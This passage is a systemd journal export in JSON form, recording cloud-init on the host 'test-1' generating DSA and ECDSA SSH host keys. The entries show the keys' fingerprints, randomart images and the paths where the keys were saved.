"PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "SHA256:Na+AYIqFXLqoKkXS4zW6wF1+NS6RxOOD/JsWTw2BofU root@test-1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a1;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=547039c05140533d", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key's randomart image is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a2;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=401634972dd94bba", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+---[DSA 1024]----+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a3;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=a83f8735ae8f9030", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| . .oo |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a4;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=dbae0df9fa9d5f8e", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|..o o=.. |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a5;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=a516beba4bfef383", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|.+. +.+ oE+ |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a6;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=45b99d8cac7df288", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|oo=oo= * = o |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a7;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=4b3fe0ad6ac79608", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|+=o+o.o S + . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a8;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=9d48e74fac6405ae", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|o.+. . = + o |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a9;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=7bef29980580dbf8", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|.o . . B . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2aa;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=8ac3dd8ded6f813a", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|o . + . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ab;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=69755eccf423747f", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|o . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ac;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=bd50657e96b79a01", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+----[SHA256]-----+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ad;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=8404d615c5ac7141", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Generating public/private ecdsa key pair." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ae;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=ff1320d32445e830", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your identification has been saved in /etc/ssh/ssh_host_ecdsa_key." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2af;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=5c01b1f22bbb1520", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your public key has been saved in /etc/ssh/ssh_host_ecdsa_key.pub." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b0;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2faa7d692a908da5", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key fingerprint is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b1;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=5750a197ed3e2276", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "SHA256:ik8suaV9cNf+I5fd9XYM2qoT9vF08FA3bGdE4oH0qQo root@test-1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b2;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=547039c05140533d", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key's randomart image is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b3;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=b912c77efc7e4919", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+---[ECDSA 256]---+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b4;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=7bb4603c042c98da", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| ...+oo|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b5;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=7ee5b8e9f9dc40d2", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| .o B=|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b6;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=ff7cff72ff6643ba", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| =o+|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b7;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=8accf5e248f6a562", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| .o |" } { "__CURSOR" : 